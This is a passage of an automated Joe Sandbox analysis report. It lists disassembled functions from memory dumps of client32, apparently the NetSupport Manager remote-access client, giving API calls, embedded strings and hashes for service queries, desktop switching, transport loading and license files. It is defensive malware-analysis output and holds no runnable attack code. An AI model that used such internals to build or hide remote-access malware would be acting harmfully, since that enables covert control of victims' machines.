Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-1114959992
Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5

Function 1102C850 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,CF3D35D0), ref: 1102CA84
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
Sleep.KERNEL32(00000032), ref: 1102CAC6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
Sleep.KERNEL32(000003E8), ref: 1102CB22
CloseHandle.KERNEL32(?), ref: 1102CB4F

Strings

ProtectedStorage, xrefs: 1102CA94
NSA.LIC, xrefs: 1102CB96
>, xrefs: 1102C9FB
NSM.LIC, xrefs: 1102CB87, 1102CB9D, 1102CBCD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51

Function 687E1D3F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON

Download Yara Rule

APIs

__set_flsgetvalue.MSVCR100(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D6A

Part of subcall function 687E0341: TlsGetValue.KERNEL32(?,687E0713), ref: 687E034A

TlsGetValue.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D7B
_calloc_crt.MSVCR100(00000001,00000214), ref: 687E1D8E
DecodePointer.KERNEL32(00000000), ref: 687E1DAC
_initptd.MSVCR100(00000000,00000000), ref: 687E1DBE

Part of subcall function 687E1E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,687E1F38,00000008,688075E9,00000000,00000000), ref: 687E1EAC
Part of subcall function 687E1E9B: _lock.MSVCR100(0000000D), ref: 687E1EE0
Part of subcall function 687E1E9B: InterlockedIncrement.KERNEL32(?), ref: 687E1EED
Part of subcall function 687E1E9B: _lock.MSVCR100(0000000C), ref: 687E1F01

GetCurrentThreadId.KERNEL32 ref: 687E1DC5
__freeptd.LIBCMT ref: 687E2971
__heap_init.LIBCMT ref: 687EB8B1
GetCommandLineA.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687EB8E2
GetCommandLineW.KERNEL32 ref: 687EB8ED
__ioterm.LIBCMT ref: 687F7B7E
free.MSVCR100(00000000), ref: 68807485

Memory Dump Source

Source File: 00000007.00000002.4193839189.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true

Associated: 00000007.00000002.4193813710.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193909993.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193930667.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193949987.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_687d0000_client32.jbxd

Similarity

API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
String ID:
API String ID: 2121586863-0
Opcode ID: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
Instruction ID: c565353fb3ec03c29bf6ec110e6dccc42e152edcce28fd538532ed449f422d66
Opcode Fuzzy Hash: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
Instruction Fuzzy Hash: 6231BE79488741DADB117BBE8B4E53D3AB4EF4739ABE00936F469D9140DF3180428AB2

Function 1112FC80 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1112FCF0
GetTickCount.KERNEL32 ref: 1112FD21
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
GetTickCount.KERNEL32 ref: 1112FD3C

Strings

CommonPath, xrefs: 1112FD5F
Software\NSL, xrefs: 1112FD64
%s%s, xrefs: 1112FCEA, 1112FD8E
HasStudentComponents=%d, xrefs: 1112FDB7
runplugin.exe, xrefs: 1112FCCE
Warning. SHGetFolderPath took %d ms, xrefs: 1112FD46
schplayer.exe, xrefs: 1112FD78

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92

Function 11030438 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6

GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02208D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
_sprintf.LIBCMT ref: 1103078D
_setlocale.LIBCMT ref: 11030797

Strings

.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F
pcicl32, xrefs: 11030851

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$pcicl32
API String ID: 3430446287-3899566344
Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52

Function 11141710 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
_memset.LIBCMT ref: 1114179D

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

_strncpy.LIBCMT ref: 1114186A

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

RegCloseKey.KERNEL32(00000000), ref: 11141906

Strings

CurrentVersion, xrefs: 111417E4
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 1114176B
CurrentMajorVersionNumber, xrefs: 11141898
CSDVersion, xrefs: 111417BA
CurrentMinorVersionNumber, xrefs: 111418D0
Service Pack, xrefs: 1114194D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91

Function 11026810 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11026896
_strtok.LIBCMT ref: 110268D0
Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4

Strings

Retrying..., xrefs: 110269B2
UseNCS, xrefs: 110268ED
TCPIP, xrefs: 110268F2
LoadTransports(%d), xrefs: 1102690C
Client, xrefs: 11026886, 1102692B
Protocols, xrefs: 11026881
*max_sessions, xrefs: 11026926
Error. not all transports loaded (%d/%d), xrefs: 11026998

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792

Function 68598D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,685A67B5), ref: 68598D6B

Part of subcall function 68594F70: LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78

GetCurrentProcessId.KERNEL32 ref: 68598DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68598DD8
FreeLibrary.KERNEL32(?), ref: 68598EBF

Part of subcall function 68594FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
Part of subcall function 68594FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE

Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034

Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E

Strings

pcictl_247.dll, xrefs: 68598E6C
is247, xrefs: 68598D42
CLIENT247, xrefs: 68598DA7
NSM247, xrefs: 68598D8B
Set Is247=%d, xrefs: 68598ED7
NSM247Ctl.dll, xrefs: 68598E7E

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
Instruction ID: ab8864ea8cf839c0dac882c909dfb3055c68c0a934503256c46ccfb76580efe1
Opcode Fuzzy Hash: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
Instruction Fuzzy Hash: C841F8759402599BEF10DB59DC55FFEB378EB45704FC00095EE29A2240EB319E84CF62

Function 110FFE60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3

GetCurrentThreadId.KERNEL32 ref: 110FFE7C
GetThreadDesktop.USER32(00000000), ref: 110FFE83
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
SetThreadDesktop.USER32(00000000), ref: 110FFEA0
CloseDesktop.USER32(00000000), ref: 110FFEB9
GetLastError.KERNEL32 ref: 110FFEC1
CloseDesktop.USER32(00000000), ref: 110FFED7
GetLastError.KERNEL32 ref: 110FFEDF

Strings

SetThreadDesktop(%s) ok, xrefs: 110FFEAB
SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3

Function 1115AB80 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
GetLastError.KERNEL32 ref: 1115ABB5
wsprintfA.USER32 ref: 1115ABC8

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19

Strings

GlobalAddAtom failed, e=%d, xrefs: 1115ABC2
..\ctl32\wndclass.cpp, xrefs: 1115ABD9, 1115ABF5
NSMDropTarget, xrefs: 1115AC0E
NSMReflect, xrefs: 1115AC07
m_aProp, xrefs: 1115ABFA
NSMWndClass, xrefs: 1115ABA0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
